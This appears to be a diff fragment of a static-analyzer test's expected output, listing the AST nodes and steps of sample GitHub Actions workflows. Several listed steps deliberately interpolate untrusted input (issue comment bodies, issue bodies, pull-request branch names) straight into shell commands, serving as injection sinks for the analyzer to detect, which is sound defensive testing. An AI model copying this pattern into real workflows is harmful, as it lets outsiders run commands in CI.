| -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | -runExprs -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -uses -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -stepUses -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -usesArgs -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -runStepChildren -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -parentNodes -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:33:14 | Run Step | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo 